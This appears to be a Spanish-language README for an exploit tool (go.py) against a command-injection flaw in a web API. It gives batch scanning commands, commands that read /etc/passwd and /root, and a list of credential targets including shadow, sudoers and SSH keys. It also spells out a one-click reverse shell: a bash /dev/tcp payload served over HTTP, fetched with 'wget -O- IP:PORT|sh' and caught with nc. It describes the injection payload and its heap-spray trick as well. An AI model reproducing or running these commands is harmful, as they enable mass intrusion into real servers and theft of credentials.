
Incluye detección de comandos ejecutables y getshell con un clic (requiere un servicio de despliegue en el servidor)
Incluye detección de comandos ejecutables y getshell con un solo clic (requiere un servicio desplegado en el servidor) pco.yaml junto con nuclei permite una detección rápida
python go.py
Introduzca la URL objetivo → seleccione el menú de funciones.
# Detección rápida (8 elementos de información básica)
python go.py -t https://IP:PORT --probe fast
# Detección profunda (todos los comandos: 30+ elementos)
python go.py -t https://IP:PORT --probe deep
# Detección por lotes
python go.py -f vulnerable_targets.txt --probe fast
python go.py -t https://IP:PORT -c "hostname"
python go.py -t https://IP:PORT -c "ls -la /root"
python go.py -t https://IP:PORT -c "cat /etc/passwd"
# Lotes concurrentes (20 hilos)
python go.py -f targets.txt -c "hostname" --batch 20
En la máquina atacante, abre dos terminales:
# Terminal 1 - Servicio HTTP (proporciona rev.sh)
echo 'bash -i >& /dev/tcp/YOUR_IP/8088 0>&1' > index.html
python3 -m http.server 8087
# Terminal 2 - Esperar la shell inversa
nc -lvnp 8088
Luego envía el payload:
# Objetivo único
python go.py -t https://IP:PORT -l YOUR_IP -p 8087 -n 8088
# Por lotes (en serie, solo uno a la vez)
python go.py -f targets.txt -l YOUR_IP -p 8087 -n 8088
El script imprimirá los pasos de preparación antes de enviar.
| Categoría | Comando |
|---|---|
| Información básica | hostname, uname -a, kernel, OS release, uptime |
| Usuarios | id, whoami, users/w/who |
| Red | ifconfig, route, arp, listening ports, connections, iptables |
| Sistema | processes, cpuinfo, meminfo, disk, mount |
| Archivos | ls / /root /tmp /home /etc |
| Configuración | crontab, passwd, shadow, sudoers, SSH keys |
| Extensión | config search, scripts, docker, containers |
{"cmd":"getall","apiuser":"''''","apipass":"BBBBB",
"g0":"AAAAAAAAAAAAAAAA'; <命令> #", ...}
apiuser="''''" desencadena el error de escape_quotes() que no termina en nullg0~g60 heap spray 61 veces, aumentando la tasa de éxito'; <命令> # cierra el contexto, # comenta lo siguienteSin echo tag se pueden usar 34 caracteres:
wget -O- IP:PORT|sh (31 caracteres)
Cadena de tuberías: wget descarga → sh ejecuta → bash regresa el shell inverso al puerto especificado.
| Parámetro | Función |
|---|---|
-t, --target URL | Dirección objetivo |
-f, --file FILE | Archivo de lista de objetivos |
-l, --lhost IP | IP de la máquina atacante |
-p, --lport PORT | Puerto del servicio HTTP (por defecto 8087) |
-n, --ncport PORT | Puerto de escucha nc (por defecto 8088) |
-c, --cmd CMD | Ejecutar comando |
--probe fast/deep | Detección rápida/profunda |
--batch N | Número de lotes concurrentes (por defecto en serie) |